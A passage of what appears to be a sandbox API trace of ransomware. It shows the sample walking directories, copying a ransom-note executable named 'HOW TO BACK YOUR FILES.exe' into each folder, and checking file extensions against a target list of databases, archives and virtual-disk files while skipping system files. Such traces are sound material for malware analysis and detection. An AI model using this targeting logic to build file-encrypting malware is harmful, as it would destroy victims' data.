(in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.682] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.682] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.683] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.683] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.683] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.683] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.683] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.683] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.683] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1.0", cAlternateFileName="")) returned 1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="aoldtz.exe") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2=".") returned 1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="..") returned 1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="windows") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="bootmgr") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="temp") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="pagefile.sys") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="boot") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="ids.txt") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="ntuser.dat") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="perflogs") returned -1 [0089.683] lstrcmpiW (lpString1="1.0", lpString2="MSBuild") returned -1 [0089.683] lstrlenW (lpString="1.0") returned 3 [0089.683] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*") returned 48 [0089.683] lstrcpyW (in: lpString1=0x2cce45e, lpString2="1.0" | out: lpString1="1.0") returned="1.0" [0089.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0089.683] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x66) returned 0x2e4710 [0089.683] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0089.683] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.683] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.683] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.683] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.683] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0089.683] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" [0089.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0089.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0089.684] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned 50 [0089.684] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0") returned="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0" [0089.684] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.684] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.684] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.684] GetLastError () returned 0x0 [0089.684] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.684] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.684] CloseHandle (hObject=0x120) returned 1 [0089.684] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.684] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.685] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.685] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.685] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.685] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.685] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.685] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.685] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.685] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.685] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.685] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0089.685] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0089.685] lstrlenW (lpString="en-US") returned 5 [0089.685] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*") returned 52 [0089.685] lstrcpyW (in: lpString1=0x2cce466, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0089.685] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ac8 [0089.685] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1608 [0089.685] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7ad0 | out: ListHead=0x2e7710, ListEntry=0x2e7ad0) returned 0x2e7ab0 [0089.685] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.685] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.685] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c8bd1c0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0089.686] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.686] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7ad0 [0089.686] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0089.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0089.686] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0089.686] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned 56 [0089.686] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0089.686] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.686] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\assistance\\client\\1.0\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.686] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.686] GetLastError () returned 0x0 [0089.686] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.687] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.687] CloseHandle (hObject=0x120) returned 1 [0089.687] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.687] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.687] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.687] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.687] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.687] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c8bd1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c8bd1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.687] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.687] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.687] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.687] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.687] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2436abaa, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xabde2c6f, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa65a8bbf, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x2f22, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Help_CValidator.H1D", cAlternateFileName="HELP_C~1.H1D")) returned 1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="aoldtz.exe") returned 1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2=".") returned 1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="..") returned 1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="windows") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="bootmgr") returned 1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="temp") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="pagefile.sys") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="boot") returned 1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="ids.txt") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="ntuser.dat") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="perflogs") returned -1 [0089.687] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2="MSBuild") returned -1 [0089.687] lstrlenW (lpString="Help_CValidator.H1D") returned 19 [0089.688] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*") returned 58 [0089.688] lstrcpyW (in: lpString1=0x2cce472, lpString2="Help_CValidator.H1D" | out: lpString1="Help_CValidator.H1D") returned="Help_CValidator.H1D" [0089.688] lstrlenW (lpString="Help_CValidator.H1D") returned 19 [0089.688] lstrlenW (lpString="Ares865") returned 7 [0089.688] lstrcmpiW (lpString1="tor.H1D", lpString2="Ares865") returned 1 [0089.688] lstrlenW (lpString=".dll") returned 4 [0089.688] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2=".dll") returned 1 [0089.688] lstrlenW (lpString=".lnk") returned 4 [0089.688] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2=".lnk") returned 1 [0089.688] lstrlenW (lpString=".ini") returned 4 [0089.688] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2=".ini") returned 1 [0089.688] lstrlenW (lpString=".sys") returned 4 [0089.688] lstrcmpiW (lpString1="Help_CValidator.H1D", lpString2=".sys") returned 1 [0089.688] lstrlenW (lpString="Help_CValidator.H1D") returned 19 [0089.688] lstrlenW (lpString="bak") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="bak") returned 1 [0089.688] lstrlenW (lpString="ba_") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="ba_") returned 1 [0089.688] lstrlenW (lpString="dbb") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="dbb") returned 1 [0089.688] lstrlenW (lpString="vmdk") returned 4 [0089.688] lstrcmpiW (lpString1=".H1D", lpString2="vmdk") returned -1 [0089.688] lstrlenW (lpString="rar") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="rar") returned -1 [0089.688] lstrlenW (lpString="zip") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="zip") returned -1 [0089.688] lstrlenW (lpString="tgz") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="tgz") returned -1 [0089.688] lstrlenW (lpString="vbox") returned 4 [0089.688] lstrcmpiW (lpString1=".H1D", lpString2="vbox") returned -1 [0089.688] lstrlenW (lpString="vdi") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="vdi") returned -1 [0089.688] lstrlenW (lpString="vhd") returned 3 [0089.688] lstrcmpiW (lpString1="H1D", lpString2="vhd") returned -1 [0089.688] lstrlenW (lpString="vhdx") returned 4 [0089.688] lstrcmpiW (lpString1=".H1D", lpString2="vhdx") returned -1 [0089.688] lstrlenW (lpString="avhd") returned 4 [0089.688] lstrcmpiW (lpString1=".H1D", lpString2="avhd") returned -1 [0089.688] lstrlenW (lpString="db") returned 2 [0089.689] lstrcmpiW (lpString1="1D", lpString2="db") returned -1 [0089.689] lstrlenW (lpString="db2") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="db2") returned 1 [0089.689] lstrlenW (lpString="db3") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="db3") returned 1 [0089.689] lstrlenW (lpString="dbf") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="dbf") returned 1 [0089.689] lstrlenW (lpString="mdf") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="mdf") returned -1 [0089.689] lstrlenW (lpString="mdb") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="mdb") returned -1 [0089.689] lstrlenW (lpString="sql") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="sql") returned -1 [0089.689] lstrlenW (lpString="sqlite") returned 6 [0089.689] lstrcmpiW (lpString1="or.H1D", lpString2="sqlite") returned -1 [0089.689] lstrlenW (lpString="sqlite3") returned 7 [0089.689] lstrcmpiW (lpString1="tor.H1D", lpString2="sqlite3") returned 1 [0089.689] lstrlenW (lpString="sqlitedb") returned 8 [0089.689] lstrcmpiW (lpString1="ator.H1D", lpString2="sqlitedb") returned -1 [0089.689] lstrlenW (lpString="xml") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="xml") returned -1 [0089.689] lstrlenW (lpString="$er") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="$er") returned 1 [0089.689] lstrlenW (lpString="4dd") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="4dd") returned 1 [0089.689] lstrlenW (lpString="4dl") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="4dl") returned 1 [0089.689] lstrlenW (lpString="^^^") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="^^^") returned 1 [0089.689] lstrlenW (lpString="abs") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="abs") returned 1 [0089.689] lstrlenW (lpString="abx") returned 3 [0089.689] lstrcmpiW (lpString1="H1D", lpString2="abx") returned 1 [0089.689] lstrlenW (lpString="accdb") returned 5 [0089.689] lstrcmpiW (lpString1="r.H1D", lpString2="accdb") returned 1 [0089.689] lstrlenW (lpString="accdc") returned 5 [0089.689] lstrcmpiW (lpString1="r.H1D", lpString2="accdc") returned 1 [0089.689] lstrlenW (lpString="accde") returned 5 [0089.689] lstrcmpiW (lpString1="r.H1D", lpString2="accde") returned 1 [0089.690] lstrlenW (lpString="accdr") returned 5 [0089.690] lstrcmpiW (lpString1="r.H1D", lpString2="accdr") returned 1 [0089.690] lstrlenW (lpString="accdt") returned 5 [0089.690] lstrcmpiW (lpString1="r.H1D", lpString2="accdt") returned 1 [0089.690] lstrlenW (lpString="accdw") returned 5 [0089.690] lstrcmpiW (lpString1="r.H1D", lpString2="accdw") returned 1 [0089.690] lstrlenW (lpString="accft") returned 5 [0089.690] lstrcmpiW (lpString1="r.H1D", lpString2="accft") returned 1 [0089.690] lstrlenW (lpString="adb") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="adb") returned 1 [0089.690] lstrlenW (lpString="adb") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="adb") returned 1 [0089.690] lstrlenW (lpString="ade") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="ade") returned 1 [0089.690] lstrlenW (lpString="adf") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="adf") returned 1 [0089.690] lstrlenW (lpString="adn") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="adn") returned 1 [0089.690] lstrlenW (lpString="adp") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="adp") returned 1 [0089.690] lstrlenW (lpString="alf") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="alf") returned 1 [0089.690] lstrlenW (lpString="ask") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="ask") returned 1 [0089.690] lstrlenW (lpString="btr") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="btr") returned 1 [0089.690] lstrlenW (lpString="cat") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="cat") returned 1 [0089.690] lstrlenW (lpString="cdb") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="cdb") returned 1 [0089.690] lstrlenW (lpString="ckp") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="ckp") returned 1 [0089.690] lstrlenW (lpString="cma") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="cma") returned 1 [0089.690] lstrlenW (lpString="cpd") returned 3 [0089.690] lstrcmpiW (lpString1="H1D", lpString2="cpd") returned 1 [0089.690] lstrlenW (lpString="dacpac") returned 6 [0089.690] lstrcmpiW (lpString1="or.H1D", lpString2="dacpac") returned 1 [0089.691] lstrlenW (lpString="dad") returned 3 [0089.691] lstrcmpiW (lpString1="H1D", lpString2="dad") returned 1 [0089.691] lstrlenW (lpString="dadiagrams") returned 10 [0089.691] lstrcmpiW (lpString1="idator.H1D", lpString2="dadiagrams") returned 1 [0089.691] lstrlenW (lpString="daschema") returned 8 [0089.691] lstrcmpiW (lpString1="ator.H1D", lpString2="daschema") returned -1 [0089.691] lstrlenW (lpString="db-journal") returned 10 [0089.691] lstrcmpiW (lpString1="idator.H1D", lpString2="db-journal") returned 1 [0089.691] lstrlenW (lpString="db-shm") returned 6 [0089.691] lstrcmpiW (lpString1="or.H1D", lpString2="db-shm") returned 1 [0089.691] lstrlenW (lpString="db-wal") returned 6 [0089.691] lstrcmpiW (lpString1="or.H1D", 